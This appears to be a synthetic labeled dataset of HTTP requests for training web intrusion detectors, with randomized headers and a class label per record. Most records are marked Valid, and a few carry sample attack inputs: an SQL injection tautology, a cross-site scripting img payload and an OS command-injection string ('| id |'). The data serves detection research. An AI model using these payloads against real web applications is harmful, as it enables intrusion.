Warning: 010 103.159.234.205 "gl6ayodfhturh" "Fri, 18 Jul 08 24:07:19 CET"
X-Forwarded-For: 25.130.189.6
X-Serial-Number: 648318819511788387
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13487
Start - Id: 17041
class: Valid
GET /f@KN.Xt5NxqzAHfV3/rjH6.Gm3c/etTw9sAltipE/okfKf/4jByY3WyO.jpg?9passwdF3=c1ch&oedsenuz67m=412&ensj=mjlQ38&idkWqz=on%29sAn&byyX=msr9tatmlhEWuUUOrD&thmxejc=5523520770&oygeuefmdUels=oysZ&attd=Heunecw&ego0=hmAR-&nezsx4m99=ljN&Eiaeagajwy=pqnyboot.inifttoh%28Se+&YTAcnvbscriptHVwgb=dowunReheru&lweurys=rialupo1saccess_log+sy9E HTTP/1.0
Host: 157.21.37.230:9843
Connection: ksiNd
Accept: image/jpeg
Accept-Charset: x-mac-roman;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 74.121.163.196
Cookie: Qrtp9C=965596995
Cookie2: $Version="495"
Date: Fri, 27 Oct 06 21:04:15 CET
ETag: W/"2wojHnUF5dDWef1"
Expect: 100-continue
From: 7Srcii@daigi.st
If-Modified-Since: Fri, 03 Jun 05 23:39:05 GMT
If-Unmodified-Since: Mon, 14 Feb 05 10:14:42 UTC
If-Match: "qcbzCF3OTpYfsMG-IUW"
If-None-Match: "ykkJw.O94D3PAbWUI"
If-Range: Tue, 02 Sep 08 04:57:07 GMT
Max-Forwards: 588
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: etoT lefruaR=btta3nc
Authorization: Digest qop=hurn9wxK
Range: 10-568,367-
Referer: /yhe2s/nHtetp5.fgf
TE: trailers,trailers,chunked
Trailer: Accept
User-Agent: moeaiiOdiarper
UA-CPU: PowerPC
UA-Disp: 7236,439,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3768x758
Via: sps/0.7 141.213.216.79
Transfer-Encoding: deflate
Upgrade: an5e/3.9, ubn5/9.2, 1enCH/8.4, mcnh/6.1
Warning: 826 www.RyE2ueeh.gif "spansolD" "Sun, 02 Oct 05 08:18:17 UTC"
X-Forwarded-For: 146.223.240.130
X-Serial-Number: 88882390422538145
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17041
Start - Id: 13315
class: Valid
GET /unionVbgsoundwFJ/ulaenhIoeyi/3A8zg7yhgZwo.html?PNMXh_Ax=36%7E%27&fnuiiinrtbn=nZstnNVV&Mh@eT=l%26owaobjectcs&qoe=9uePi&a5wsn=httpovhrtgsh5Sm&aiuezs7eiI=0365&noonmtfA=4437682&hna7Eewaton=7559&h7uoqnneee=hAbJnGo.O&natthteioaoes=%25&toztetiTaue8kq=657703809 HTTP/1.0
Host: www.t199WayShn.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: n-1ftEdoi
Cache-Control: max-age=814
Client-ip: 84.222.103.71
Cookie: as7let2h7omeu=537
Cookie2: $Version="2"
Date: Fri, 03 Nov 06 03:17:30 UTC
ETag: W/"9UbTu_og7eLaQOj67h5"
Expect: 100-continue
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Tue, 20 May 08 07:07:09 CET
If-Unmodified-Since: Mon, 23 Mar 09 13:59:42 UTC
If-Match: "EmbKjH5bMbgWjt.HEq"
If-None-Match: "jpDVmXxRbj3eGVpN"
If-Range: Thu, 27 Aug 09 24:39:16 UTC
Max-Forwards: 6
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic aG9vZjp0bzlhZW8=
Authorization: Digest uri=http://etaaar3.gov/dshreloo/Eisago.tiff
Range: 5-,276794-,1-44
Referer: /ehha/ublchei/eokIftl/hsetrV6/ep84i.cgi
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 4.9; up-qg; rv:3.9.7) Gecko/52418665
UA-CPU: Sparc
UA-Disp: 537,5554,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1944x150
Via: FTP/0.7 159.127.22.166, sTor/0.6 www.n4n8.css, nsl4/3.2 www.titz.gif:78524
Transfer-Encoding: deflate
Upgrade: cRSP/8.6, no8s/8.1, 7spiw/8.5
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 86.238.108.143
X-Serial-Number: 2177345757
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13315
Start - Id: 2950
class: Valid
GET /iSEZs/xn/I5jz@@passthruscopyautoexecn/to6wkcnpfaq7/74CjhM.htm?serwtft4q=oeshm24hia4&0tYVjxsdhtacces=mma%28tvodolt%26hai%3Fmail&roiRge=olopasswd%29FfT0aopen%25t+w5esd%3F&Ai8Bahotolsy=d&nsieecI0=eetsle&I58eisaoaAsls=3653945423&Fccj66rtssreen=hdrpmaeotnadethS HTTP/1.1
Host: 61.181.234.139:109
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 169.197.153.152
Cookie: Q15shutdownv@IC5ONr=ips;ubw4gtotdi2hoe5=hpE8nDwZou;tlIminrt2crfhH=ce3sf;Fw7Ag=s=>dt
Cookie2: $Version="553"
Date: Wed, 28 Sep 05 15:19:55 GMT
ETag: "kqymBXwIb4BDZBZzH"
Expect: 100-continue
From: Iohco@rBgrnzg.net
If-Modified-Since: Wed, 09 Feb 05 19:14:37 CET
If-Unmodified-Since: Sun, 27 Aug 06 04:13:13 UTC
If-Match: *
If-None-Match: "hFwHHEy@83-FhZO"
If-Range: Thu, 06 Dec 07 20:01:32 UTC
Max-Forwards: 9740
MIME-Version: 7.2
Pragma: tdb=7
Proxy-Authorization: Digest cnonce="si4s"
Authorization: Digest uri=http://dmLuuscn.gov/eiesatn/Aonlesl/tHDtrtt/iaeRb.png
Range: 88640-9956,7533-4307
Referer: /5yth.avi
TE: deflate,chunked
Trailer: Date
User-Agent: d9aO6N9ea (oomAtg803; j62@Jc; iBe7ACaW)
UA-CPU: StrongARM
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8247x2505
Via: HTTP/5.6 www.reeoirks.jpeg:8190
Transfer-Encoding: compress
Upgrade: Diah/3.5, rn3tnm/4.9, a5emrt/3.5, ic7/0.5, aehi/9.7
Warning: 909 147.139.214.46 "xasxjoeuPm2r3W" 
X-Forwarded-For: 251.157.153.85
X-Serial-Number: 1920071
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2950
Start - Id: 3099
class: Valid
GET /tFe6qM1zfjy4/@_HTquexec9vbscriptDCxK/nhiONetiet9e/twbNaM9U_kK5045lF1OZ/uoyisxacwh0og.mspx?ro5ccrthraeea=+7&lstqg=childtD&iaeu=di%7C%2F6cT&tdCgnavomjm=t6OGYpyevTl HTTP/1.0
Host: 152.54.99.66
Connection: inoqwr7
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: identity, identity, gzip, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 107.69.94.44
Cookie: bteuAHtnteeetU8=i0A;dIew82imnvcsf=sNW;ddegrs19eitn=window.openftpc;ramiooeis8ni=330393;htlolsRtdrmi=676
Cookie2: $Version="564"
Date: Fri, 14 Nov 08 21:16:14 UTC
ETag: W/"uHGKV8CrIhA@9Y9gg4QB"
Expect: elratie
From: elot@iettrDhpp.gov
If-Modified-Since: Sat, 03 Jan 09 18:53:54 UTC
If-Unmodified-Since: Sat, 22 Aug 09 13:58:22 CET
If-Match: "7gm7KFFxWZxPq1E"
If-None-Match: "UU9SPYiGKcQrfzeK.xL"
If-Range: Tue, 29 Jul 08 18:07:35 GMT
Max-Forwards: 27
MIME-Version: 0.4
Pragma: atwnl='e'
Proxy-Authorization: Basic ZHZnZDo3c2F3YXM=
Authorization: tmnhn2 Hesd=eaaahsa
Range: 8-53,59566-35,-6851
Referer: http://www.aEsmutra.gov/NnAIst/tsUdP.php3
TE: gzip,deflate,deflate
Trailer: Upgrade
User-Agent: gtet (rB3825WOuJ)
UA-CPU: MIPS
UA-Disp: 3610,5724,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3082x5034
Via: 9.8 98.192.179.92, 5.5 www.st9aal.html
Transfer-Encoding: gzip
Upgrade: ket/3.8, j3t/3.2
Warning: 690 25.36.240.58 "khpSxlij80Psteslo" "Tue, 28 Oct 08 11:10:05 CET"
X-Forwarded-For: 240.223.9.140
X-Serial-Number: 315450013052387
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3099
Start - Id: 43023
class: OsCommanding
PUT /1mgEtgiCn4N.gif? HTTP/1.1
Content-Length: 274
Content-Language: eMI8cim,5e,hEnoqrj
Content-Encoding: compress
Content-Location: /cNrtrtA/byso.asp
Content-MD5: ZTVvaWVtb3NlaGdvbGVyNw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 06:40:20 GMT
Last-Modified: Sat, 12 Nov 05 17:30:31 CET
Host: 56.134.138.84
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-8;q=0.5, iso-8859-8-i, ks_c_5601-1987, us-ascii, windows-1253
Accept-Encoding: identity;q=0.5, gzip, identity, gzip;q=0.9, deflate;q=0.0
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 107.129.200.203
Cookie: dmngynsAyaa=mre;nuwr=37rakrtiarfqkc:A;ewoedtretblOG==te;0dBJ2pSENZVk=go;oF1NrZ=htaccesscriptscriptm
Cookie2: $Version="6"
Date: Mon, 23 Jul 07 15:25:18 CET
ETag: "MCaPKcldcM8leI_Vy"
Expect: 100-continue
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Sun, 12 Mar 06 08:33:59 CET
If-Unmodified-Since: Wed, 14 Apr 10 15:40:43 UTC
If-Match: "-0@IkeB4KQIdmhGDSE@O"
If-None-Match: *
If-Range: "-jqt.BMEeUF_PqoA"
Max-Forwards: 56
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Basic cmlnNzpxaHN1
Range: -98633,070828-,-9277
Referer: http://riqiett.fr/r2O5/o1ri2koh/euomnle.cfm
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: in_QwiRmn http://www.vfgl.gov
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2695x320
Via: 0.3 www.5hN0l.shtml:9, HTTP/8.5 168.223.20.107, 3.1 www.ohwoubri.gif
Transfer-Encoding: gzip
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

nllurEzsb8tahy=4428&maNrtisNdnaseod=viwaB&atajsryqk=hbd4m5itonnslI&vIemtar=e:replace@atzt0sc&qkiIeerteegrc8=rrwmo&P1xMVr@dv=ig_RF_r_OZvM&sWFvlPT=|    id  |&ddefzRdlee=ien i&pM-dqbb=olstnomoi&agtds=axc&ido8snzatOj8arr=leddtrmdc +-style:Srltee&linCynsndeA=vmochaNm

End - Id: 43023
Start - Id: 19217
class: Valid
GET /18m/6T5jZkxzOgZNiAY.HC/w.nBdJkuss6Cvunphg/iset9tt0teaseTd/rEnhiuitsin0tcprmd/eokhinh/uj8F5V.gif?ngentqe=sXPRLCLy&ctf=3en&ethtpdyoltgs=9992335&0xu8eTrnmwcea=umochatS&0o=+o&eeMoargthi=saryttlt&niinNih=il0je0nihaving%28%7Edropg&e0avEl4h=1276&hkn1hnl=194&pshaving.FCb_pAB1=+E7m HTTP/1.1
Host: www.kretr.org
Connection: close
Accept: application/rtf;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: mnos59sc-alhtS;q=0.0
Cache-Control: lepu=j
Client-ip: 110.180.76.34
Cookie: irosai=>(o6taiTe;uedisenoa=enhpyVOKj;hhenehEreheeer=67;atmn7actl=nb-MW6L046g
Cookie2: $Version="324"
Date: Tue, 28 Oct 08 14:55:44 GMT
ETag: "ZXZzmThQniqLJcpJkWW"
Expect: aoeggtD
From: 1Mrro3ep@siss5a8eg.net
If-Modified-Since: Thu, 03 Jun 04 16:54:07 GMT
If-Unmodified-Since: Thu, 17 Apr 08 15:11:54 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Dec 05 16:59:09 GMT
Max-Forwards: 6122
MIME-Version: 4.0
Pragma: ht=dairEe
Proxy-Authorization: Digest uri=/8tsi1ee/nreUitch/ynlernls/rylqcbHp/vyr6.shtml
Authorization: NTLM bWRtYTFhdU5zaG9ocmhvMmlvbmdvWjBMS2FvbXl0d3NvZWxuaWRuYQ==
Range: 6738-658640
Referer: http://3bif8.gov/xesEDoji/eEur/Xeihlnt/faeDSti.nsf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/0.1 (X11; U; Open BSD i586 9.0; kt-jt; rv:9.2.2) Gecko/42863168
UA-CPU: 68000
UA-Disp: 399,520,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: FTP/8.4 90.27.24.152:43, 1.5 52.31.41.211
Transfer-Encoding: compress
Upgrade: deldgt/6.6
Warning: 712 119.160.165.41 "pneeepsiiweeth" "Wed, 09 Apr 08 02:46:58 CET"
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 31033243317448893710
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19217
Start - Id: 42588
class: SqlInjection
GET /LuI19MaqWpositionWF/JZJveinclude5ZcOBPTA/4e8smcepsaqi/iknmhK/ee2dwet/If9ant/vEa89KAUmzJsY/iCp9FDOmAszwos/apesarl/osas5qheiphunUis/2Lb7l6UCTzMs.dll?hpifctAl=OR++++%27vwsa%27+%3D+++%27Sim%27%2B%27ple%27&sKb7taAdfn59e=n79iE&etnMt7efiuo=ox0Af1Cj2&5ieyfws9cosOn=393349&aeghw=hw&fbijlJlsoperlE=i-e&includefromformr4=etin HTTP/1.1
Host: www.nd1e.cz:80
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: oacXBsd-dtJ, srdez-1stta;q=0.4, fgh-7rtB, f-eei, ieYUgm-heuo;q=0.7
Cache-Control: no-cache
Client-ip: 218.19.16.82
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="502"
Date: Sun, 09 Oct 05 17:50:16 UTC
ETag: W/"mZwqS5u@zel3eQqIe8"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Mon, 29 Jan 07 18:12:32 GMT
If-Unmodified-Since: Tue, 20 Dec 05 16:14:25 CET
If-Match: "X940-vBvQ9LT@e8h"
If-None-Match: "@ydKyN3ohPDqZvu."
If-Range: "tt9Nba_M6DK44WebY"
Max-Forwards: 4
MIME-Version: 1.0
Pragma: 02so3=o
Proxy-Authorization: Basic Y2llZ2U6bml0aWQ=
Authorization: Digest realm
Range: 971-
Referer: http://trhhidAs.com/nhhnhww/etem.php4
TE: chunked
Trailer: From
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 9.4; vi-sw; rv:6.5.9) Gecko/94345295
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4922x3138
Via: HTTP/0.8 www.aed2Nnsl.jpg, 5.2 152.201.56.54
Transfer-Encoding: compress
Upgrade: usha/3.8, pbmz/6.8, Mhisf/9.8, cAir/5.6
Warning: 624 226.11.216.12:21651 "base2a5yw9vFoeoe" "Wed, 13 Sep 06 03:02:24 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 7047593
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42588
Start - Id: 6428
class: Valid
POST /ny9@qhK2anWtIX3hptB/lLflocation_tlkpOCR4etc/Ts/uctk2_Eu7RK/ifth6ctrhedhdlgjt/sYy.html? HTTP/1.0
Content-Length: 131
Content-Language: iya,e9j6
Content-Encoding: deflate
Content-Location: /Wmtilcee/arsfrta/ahhiiia.mdb
Content-MD5: TW9vY1kxdGFRaHRoaTZuRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Sep 04 24:14:35 GMT
Last-Modified: Thu, 11 Sep 08 19:13:24 GMT
Host: 105.124.16.159
Connection: close
Accept: application/*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.7, identity
Accept-Language: ps0r8-PhrtrNO
Cache-Control: only-if-cached
Client-ip: 148.171.92.171
Cookie: swtelsTite=ehe6gvwontAEh;cbaaihagdteie=95396627;vservices797_nLxp_8G=slbt
Cookie2: $Version="622"
Date: Mon, 14 Feb 05 22:28:53 GMT
ETag: W/"8juqnNuXkQUePH9hYC7"
Expect: navl=esus;1b2ni=eqtheF
From: 5onfgr@tttceuz.gov
If-Modified-Since: Sat, 27 Aug 05 20:33:08 GMT
If-Unmodified-Since: Wed, 29 Jul 09 17:45:34 GMT
If-Match: "CtJbETmlulv@U4w1BG"
If-None-Match: "ScUV_Fm6AsZORy7txw"
If-Range: "vKeRgTSLrlLFB8a8m"
Max-Forwards: 7025
MIME-Version: 5.7
Pragma: tn1ms='cesetu'
Proxy-Authorization: NTLM Y0FkaGNkZWV1YzN2YWx0ZWp0cHNsR2xPYVlhQTY2c3dlcGhhblJ0Z2tzZ2lhY2E=
Authorization: NTLM cm5nRGNObmV1dzlocnRpb1VpbnVtZ2lvQXNodGFzc2dlY241b0Fvcg==
Range: 60-,871981-,7-42952
Referer: /ichi/rsaNzr.jsp
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.9 (compatible; Konqueror/7.1; Windows NT; erzoenk; mtfe)
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8174x6805
Via: HTTP/0.5 151.61.133.62:0
Transfer-Encoding: gzip
Upgrade: eosNY/6.2, etmS/7.5
Warning: 834 www.myeibl.html "tfAmnsglsree" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2lnnithnepvfotT=eGnesbdesent&in=snL5W2c&n99denill=ooi&0meguiAesaeepOd=p&Dtot=540393&Neasiio=466315456&hc4rNra=@jdo v&bdTz00umt=31

End - Id: 6428
Start - Id: 17177
class: Valid
GET /f9EdYToUjMqHVr_/f2hy/1kyeimueplg.shtml? HTTP/1.0
Host: www.bustity.uk
Connection: stdI
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.0
Accept-Encoding: deflate, gzip;q=0.6, gzip
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 199.180.99.118
Cookie: snmleztzaennegi=%gn%;ltsYeP=055824
Cookie2: $Version="07"
Date: Wed, 15 Jul 09 05:33:32 UTC
ETag: "zhQch-fDvy2Xl-ugZ1"
Expect: 100-continue
From: nrne6nts@ueh4ulucb.st
If-Modified-Since: Sun, 01 Jul 07 18:25:12 UTC
If-Unmodified-Since: Fri, 16 Apr 04 05:07:43 GMT
If-Match: *
If-None-Match: "-4zwYeLJVLuSg.C"
If-Range: *
Max-Forwards: 154
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic RW9keVA6c29waXNoZWI=
Authorization: NTLM YmJTa3hvcmFlZXVzZWhkcnNpbW5vZTBpaEllZnNzYXNm
Range: -785968,-02
Referer: /doacdhw3/pepik/aira.php
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 1.4; ia-Nt; rv:5.2.7) Gecko/88459416
UA-CPU: StrongARM
UA-Disp: 150,488,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 674x357
Via: 4.2 www.8oeie.shtml, arHe/6.0 254.94.65.35, HTTP/8.6 www.rtkrnhl.jpeg
Transfer-Encoding: deflate
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 805 www.tiToe.js:8 "nemt6tdhmtanm" "Sun, 01 Feb 04 01:16:58 CET"
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 80895113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17177
Start - Id: 48047
class: XSS
GET /5tm@9lRdylg/a0ZHhcrctp7seeAcy.php3?centne4rbes3hce=goh%26mopp%3C0aAeS+&q4XZSm10Y3U=891&T6jmhRHIcopy=euGqm&ozojteDirho=%3Cimg++src%3D%22+++++livescript%3A%5Balert+%28%27Aonntlft%27%29%3B%5D+++%22+%3E&lifn=Ft3s1h HTTP/1.0
Host: www.rbr5F.biz
Connection: milE
Accept: audio/basic, application/*, text/plain;q=0.1
Accept-Charset: x-mac-chinesesimp;q=0.5, x-mac-arabic
Accept-Encoding: 
Accept-Language: TtoEsEhT-4neE;q=0.0, ahns-edrtI;q=0.3, yaeh-aae38dl3, Lieuhib-hdj9nTh
Cache-Control: a='EWd'
Client-ip: 252.198.126.142
Cookie: Y@YYa7uWtmpz=694;systemsock_streamAS.Dp@D=W5dxadaRlm;dxgih=vs;rt8sxgdqoeezig6=0otEuepgrd;mhsm=e0iesrrOeO;rmipaexafoio=13119914
Cookie2: $Version="742"
Date: Thu, 25 Aug 05 08:32:44 GMT
ETag: "TAbjxX0Cb5--Rw6U2ZA"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: elwwua@EmhIEncw.it
If-Modified-Since: Fri, 17 Nov 06 12:40:11 CET
If-Unmodified-Since: Fri, 29 Aug 08 05:57:08 GMT
If-Match: "5Zo9n_zWHv2coNR"
If-None-Match: *
If-Range: *
Max-Forwards: 179
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: jae8sr 0tnaix=eudc
Authorization: Digest qop=auth-int
Range: 16-601
Referer: /lre1a/fkke/dNn7B.png
TE: trailers
Trailer: Accept-Charset
User-Agent: Txx1ar/7.0
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9126x119
Via: 9.0 www.t33pa.tiff, oh3i6e/3.3 68.53.176.230
Transfer-Encoding: f0ac; marvnnn=q1d7E
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 405569074263988888
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48047
Start - Id: 12886
class: Valid
GET /3M@tP_GeFmQRm2/ipfLbOW9/gVB.n_R-.js?it0locationO=viatdoya&aelie=wYpZ2Gs HTTP/1.0
Host: 167.180.142.73
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, identity
Accept-Language: hteoeiWe-awd6nsr;q=0.5, hrocc5ei-cacatm9, ifemte-ad;q=0.0, aJ7EouS-Ai7no, eosdnm-leeztgti
Cache-Control: kfibeno='ltfid'
Client-ip: 138.179.154.230
Cookie: eax8zSi8x=a ;nwHi=no?o;Xa19tscrlrlgb=tinputnQritt;eeouths=:an
Cookie2: $Version="53"
Date: Fri, 04 Mar 05 14:50:39 GMT
ETag: "AbE2PL0XG@2pJRa"
Expect: 100-continue
From: ngeagi8r@t1t7.com
If-Modified-Since: Fri, 18 Nov 05 06:03:27 CET
If-Unmodified-Since: Mon, 20 Mar 06 12:59:01 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Jan 10 19:07:20 CET
Max-Forwards: 5
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM bmZlY2dlYWVldG9vZXR0SGxob2VPaHRWZXN1YTVlNDl0ZWh1MXJzbWlud2Fy
Authorization: NTLM dGVwZXpyc2h0NmJ0ZHlodGwzdGxlRGh0c2VkY3NpaXRSbDZoZG50YmxlcGlP
Range: 35161-,-2,70941-
Referer: /5Iraiejh/fsiwd4i/ecr2en/EL8ha.dll
TE: gzip,trailers
Trailer: TE
User-Agent: Mozilla/9.3 (Machintosh; U; Mac OS X 2.8; uN-Kf; rv:1.8.3) Gecko/91954636
UA-CPU: StrongARM
UA-Disp: 737,0051,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8835x5264
Via: wsAae/8.2 61.32.167.111, HTTP/8.4 219.166.137.130
Transfer-Encoding: gzip
Upgrade: fwtrra/5.7
Warning: 657 108.119.89.134 "n3Eimiaj3lnutimDg" 
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 4907746729509688
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12886
Start - Id: 810
class: Valid
GET /5xbeeshe0teqiqfa/tqXMLDk4yY/Xx83pZf/imgtv9yn9ADrDsock_stream/sl8-GyaayUMYv8rO9on/hom0e/40dGvZsb2Y7WuDaG2.js?Jtde2ojt=azOetzehdb4i6ny&0t2a8atadT=n4nY5la&watv=200422&zinputfW=si%7C&twantt5at=8baw4orblArpdihes HTTP/1.1
Host: 195.206.204.218
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.2, compress, gzip;q=0.3, identity;q=0.5
Accept-Language: *
Cache-Control: jdea=aelpeH
Client-ip: 97.242.61.48
Cookie: csr=4287;aeyaee6latee=25961214;ihtpass5-m1f5=33667;sd9oen=e;re9=ortrai;d0dsAnthen9mtav=h6XeAi6eA
Cookie2: $Version="86"
Date: Fri, 30 Dec 05 13:41:48 UTC
ETag: W/"oW8ZOiVnK1l4Rvgym"
Expect: 100-continue
From: otea@mcanstwra.de
If-Modified-Since: Wed, 28 Apr 04 07:55:20 GMT
If-Unmodified-Since: Thu, 11 Mar 04 10:15:51 GMT
If-Match: "Fmzyyq8KZklVJ3KS"
If-None-Match: "Ns0.wRweCT8q0SpK"
If-Range: Tue, 14 Jul 09 24:42:52 CET
Max-Forwards: 8624
MIME-Version: 0.8
Pragma: nm7omi='tSa'
Proxy-Authorization: nuemo snes=hteei
Authorization: Digest response="D1dfcbd2CC8A2F166cfaEe68dB04e49A"
Range: 15-20,08858-
Referer: http://www.iLi6.it/7ttnya8e.asmx
TE: chunked;q=0.8,chunked,deflate
Trailer: From
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 2.6; t0-MW; rv:4.3.1) Gecko/12564776
UA-CPU: MIPS
UA-Disp: 764,3407,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7750x8072
Via: 3.7 www.tlmGmo.html:37394, 4wVlp/8.4 169.74.50.34
Transfer-Encoding: gzip
Upgrade: 3iofx/3.1, Trldr8/3.5
Warning: 424 www.o4ylbeo1.html "eOaoepcehwUc" 
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 40823
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 810
Start - Id: 8101
class: Valid
GET /iZcnKQ3L4QGX/eo/hsabaNsa5Rte.exe?tlNi=14&aoOI9tmwfrey=99863&roblebbwhrDrigh=gPHiVTwk0sV HTTP/1.0
Host: 41.39.217.74:8
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad, iso-8859-3, windows-1257;q=0.0, iso-10646-ucs-2;q=0.6, iso-8859-1;q=0.8
Accept-Encoding: 
Accept-Language: tI8-wt, teg-isSrxt6l, 7eV-eadaa;q=0.6, silb0u-4m0Omn;q=0.5
Cache-Control: only-if-cached
Client-ip: 63.176.137.230
Cookie: ta=av9RdGUy;xs9=tzqOFwX
Cookie2: $Version="9"
Date: Wed, 28 Dec 05 15:28:45 CET
ETag: W/"EZQZ42wQZz8_bHX7yM"
Expect: rcti=i8busaat;ottreO=uetom
If-Modified-Since: Tue, 07 Nov 06 16:50:22 UTC
If-Unmodified-Since: Fri, 26 Mar 04 04:24:23 UTC
If-Match: "Rh0ZNyhTOwVXROJ5lClC"
If-None-Match: *
If-Range: Wed, 01 Nov 06 04:02:51 UTC
Max-Forwards: 2680
MIME-Version: 2.4
Pragma: l8te=xhlnvrs
Proxy-Authorization: Basic ZWNkSWllOndzam1xZQ==
Authorization: Basic ZW9lYW46cmxzc3RudA==
Range: 96926-503180,-72
Referer: /tekl/schgew/nssovet4/s9eadOE/aioe5wre.jpg
TE: trailers
Trailer: User-Agent
User-Agent: aesrrjca5aoit6aecrn
UA-CPU: 68000
UA-Disp: 4009,1990,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 308x6685
Via: 5.3 www.ye5Sve1u.htm, 9.2 172.45.22.182
Transfer-Encoding: gzip
Upgrade: iSara/8.9, eey/2.3, eswsg/1.6, Eptj/3.0
Warning: 207 www.eaigb.htm "nqposom8cjoD7Vewo1b" 
X-Forwarded-For: 20.60.245.141
X-Serial-Number: 74656
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8101
Start - Id: 20283
class: Valid
